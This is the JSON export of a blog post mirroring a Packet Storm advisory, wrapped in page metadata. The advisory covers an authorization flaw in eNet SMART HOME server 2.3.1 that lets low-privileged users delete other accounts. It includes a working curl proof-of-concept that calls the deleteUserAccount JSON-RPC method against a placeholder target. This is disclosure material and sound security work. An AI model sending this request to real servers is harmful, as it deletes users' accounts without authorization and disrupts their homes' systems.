{"id":41060,"date":"2026-02-16T12:46:45","date_gmt":"2026-02-16T12:46:45","guid":{"rendered":"http:\/\/localhost\/?p=41060"},"modified":"2026-02-16T12:46:45","modified_gmt":"2026-02-16T12:46:45","slug":"enet-smart-home-server-231-arbitrary-user-deletion","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41060","title":{"rendered":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700"},"content":{"rendered":"

{“lastseen”:”2026-02-16T18:14:19″,”description”:”The eNet Smart Home system contains an authorization weakness in the deleteUserAccount JSON-RPC method that permits any authenticated low-privileged user UGUSER to delete arbitrary user accounts, except for the built-in admin account. The application…”,”published”:”2026-02-16T00:00:00″,”modified”:”2026-02-16T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion”,”source”:””,”references”:””,”id”:”PACKETSTORM:215700″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”eNet SMART HOME server 2.3.1 (deleteUserAccount) Arbitrary User Deletion\\n \\n \\n Vendor: Gira Giersiepen GmbH \\u0026 Co. KG | ALBRECHT JUNG GmbH \\u0026 Co. KG | Insta GmbH\\n Product web page: https:\/\/www.enet-smarthome.com\\n Affected version: 2.3.1 (46841)\\n 2.2.1 (46056)\\n \\n Summary: Two German specialists in building systems technology are jointly bringing\\n a new, wireless-based smart home system to the market. Gira and JUNG are the companies\\n behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing\\n the system. All three of us are old hands when it comes to building automation, and\\n have a history of connecting buildings in an intelligent way that goes back as far as\\n the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and\\n founded EIBA (now known as KNX). KNX is the first open global standard for home and\\n building automation. Through KNX, we have decisively shaped the development of intelligent\\n building systems technology \u2013 and this wealth of experience has now come together in\\n eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and\\n offers end customers the basis for an easy-to-use and secure Smart Home and installation\\n engineers easily understandable and professional commissioning of the system.\\n \\n Desc: The eNet Smart Home system contains an authorization weakness in the deleteUserAccount\\n JSON-RPC method that permits any authenticated low-privileged user (UG_USER) to delete\\n arbitrary user accounts, except for the built-in admin account. The application does not\\n enforce proper role-based access control on this function, allowing a standard user to\\n submit a crafted request specifying another username and have that account removed without\\n elevated permissions or additional confirmation. This enables unauthorized user management\\n actions, leading to denial of service against legitimate users, disruption of operations,\\n and potential concealment of malicious activity.\\n \\n Tested on: GNU\/Linux 4.4.15 (ARMv7 revision 5)\\n Jetty(9.2.z-SNAPSHOT)\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5973\\n Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2026-5973.php\\n \\n \\n 07.02.2026\\n \\n –\\n \\n \\n $ curl -X POST \\”http:\/\/TARGETIP:8080\/jsonrpc\/management\\” \\\\\\n -H \\”Content-Type: application\/json\\” \\\\\\n -H \\”Referer: http:\/\/TARGETIP:8080\/serverconfiguration.html?icp=kRuUFOgUoCnHeaHZ5P1m\\” \\\\\\n -H \\”Cookie: INSTASESSIONID=2txt9zmzo8ij3cfdyagulvb7s\\” \\\\\\n –data ‘{\\”jsonrpc\\”:\\”2.0\\”, \\”method\\”:\\”deleteUserAccount\\”, \\”params\\”:{\\”userName\\”:\\”testingus\\”}, \\”id\\”:\\”6\\”}'”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215700″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215700\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-16T18:14:19″,”description”:”The eNet Smart Home system contains an authorization weakness in the deleteUserAccount JSON-RPC method that permits any authenticated low-privileged user UGUSER to delete arbitrary user…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41060","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41060\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-16T18:14:19″,”description”:”The eNet Smart Home system contains an authorization weakness in the deleteUserAccount JSON-RPC method that permits any authenticated low-privileged user UGUSER to delete arbitrary user...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41060\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-16T12:46:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700\",\"datePublished\":\"2026-02-16T12:46:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060\"},\"wordCount\":551,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41060#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060\",\"name\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-16T12:46:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41060\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41060#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41060","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem","og_description":"{“lastseen”:”2026-02-16T18:14:19″,”description”:”The eNet Smart Home system contains an authorization weakness in the deleteUserAccount JSON-RPC method that permits any authenticated low-privileged user UGUSER to delete arbitrary user...","og_url":"https:\/\/zero.redgem.net\/?p=41060","og_site_name":"zero redgem","article_published_time":"2026-02-16T12:46:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41060#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41060"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700","datePublished":"2026-02-16T12:46:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41060"},"wordCount":551,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41060#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41060","url":"https:\/\/zero.redgem.net\/?p=41060","name":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-16T12:46:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41060#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41060"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41060#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 eNet SMART HOME Server 2.3.1 Arbitrary User Deletion_PACKETSTORM:215700"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41060","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41060"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41060\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41060"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41060"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41060"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}